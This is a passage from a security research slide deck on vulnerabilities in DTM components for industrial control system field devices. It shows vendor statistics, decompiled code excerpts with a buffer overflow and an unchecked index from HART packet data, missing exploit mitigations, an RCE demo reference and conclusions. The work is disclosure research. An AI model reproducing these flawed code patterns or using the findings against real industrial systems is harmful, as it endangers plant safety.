MACTek Corporation
Endress+Hauser
Emerson/Rosemo…
Honey…
Magnetrol
Pepperl+Fuchs
ABB
MetsoInvesys/F
oxboro
FOXBORO-ECKARDT
KROHNE
Dresser Masoneilan
VEGA
BY DTM
GE Oil & Gas
MACTek Corporati
on Endress+Hauser
Emerson/Rosemount
HoneywellMagnetrol
Pepperl+Fuchs
ABB
Metso
Invesys/Foxboro
FOXBORO-ECKARDT
KROHNE
Dresser Masoneilan
VEGABY DEVICE
![Page 62: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/62.jpg)
Framework statistics (vulnerable DTMs)
CodeWrights28%
M&M31%
Other41%
![Page 63: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/63.jpg)
Vulns & Funny things
![Page 64: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/64.jpg)
XSS
![Page 65: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/65.jpg)
Too many data? E&H follow standards as always
217 bytes < 255
![Page 66: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/66.jpg)
“secure” memcpy
![Page 67: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/67.jpg)
M&M Software GmbH
memcpy_s(…
![Page 68: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/68.jpg)
Member buffer overflowunsigned lUbound = 0;
SafeArrayGetUBound(parray, 1, &lUbound);
unsigned rgIndices = 1;
if ( lUbound + 1 > 1 )
{
do
{
SafeArrayGetElement(
tvar->parray,
&rgIndices,
&this->BufferOverflow[rgIndices + 3]);
++rgIndices;
}
while ( rgIndices < lUbound + 1 );
}
![Page 69: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/69.jpg)
No boundaries check
CString strarray [8];
Index = GetIndex (HartPacket);
strarray[0].Init (L"%-11.0f");
strarray[1].Init (L"%-10.0f");
strarray[2].Init (L"%-9.0f");
strarray[3].Init (L"%-8.0f");
strarray[4].Init (L"%-7.0f");
strarray[5].Init (L"%-6.1f");
strarray[6].Init (L"%-5.2f");
strarray[7].Init (L"%-4.3f");
BadString = &strarray[Index];
![Page 70: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/70.jpg)
Other useful stats
Number of components Stack cookies enabled DEP enabled ASLR enabled
66 0 0 0
35 1 0 0
5 0 1 0
1 0 1 1
7 1 1 1
![Page 71: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/71.jpg)
RCE DEMO VIDEO
![Page 72: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/72.jpg)
FDT 2.0 -- is it a solution?
![Page 73: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/73.jpg)
FDT 2.0 new features
Recently, FDT group finally introduced a new version of FDT specification, v. 2.0. However, only a few devices support it. The key differences from 1.2.1 are:
• Interfaces are .Net-based
• Class architecture redesigned
• Increased performance
• No XML (interaction between FDT objects is based on .NET datatypesrather than XML)
![Page 74: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/74.jpg)
Not a complete solution
FDT 2.0 problems:
• Low spread over the industry
• Backward compatibility ((de)serialization to XML for working with FDT 1.2.* could cause problems)
• Managed code will not be a complete solution if unmanaged code is still used (e.g. calling old C++ code from .Net)
Unfortunately, we could not find a real device supported by FDT 2.0 to test it; if you have one, we can borrow it for some time ;)
![Page 75: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/75.jpg)
How it works…
![Page 76: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/76.jpg)
How it works… -- A patch for security bulletin!
![Page 77: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/77.jpg)
How it works… -- A patch for security bulletin!
![Page 78: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/78.jpg)
Conclusions
![Page 79: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/79.jpg)
Conclusions• During our research, we have found 29 vulnerabilities in
components for 501 device from 14 vendors• The quality of most vulnerable DTM components is lower than
medium• However, all these attacks are possible not only because of
DTMs weaknesses, but also due to fragile ICS architectures. The approach to the whole ICS multilayer networks should be changed. Otherwise, we will face the risks of such vulnerabilities over and over again.
• FDT 2.0 could compensate for some problems, but, unfortunately, it isn’t actively used now
• Awaiting vendors’ responses and hoping for the best!
![Page 80: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/80.jpg)
Links
• Fuzzing tools repository (will be filled upon disclosure):
http://github.com/Darkkey/DTMResearch
• ICSCorsair repository (hardware, firmware, software):
http://github.com/Darkkey/ICSCorsair
• HRTShield repository:
http://github.com/Darkkey/HRTShield
• HART parser repository:
http://github.com/Darkkey/hartparser
![Page 81: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/81.jpg)
Thanksgiving service
• Andrey Abakumov for help in finding XML injections
• George Nosenko for special binary magic and great help in reverse-engineering.
• Fedor Savelyev aka Alouette for some fuzzing ideas
![Page 82: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/82.jpg)
Q&A?@dsecru
@dark_k3y@cherboff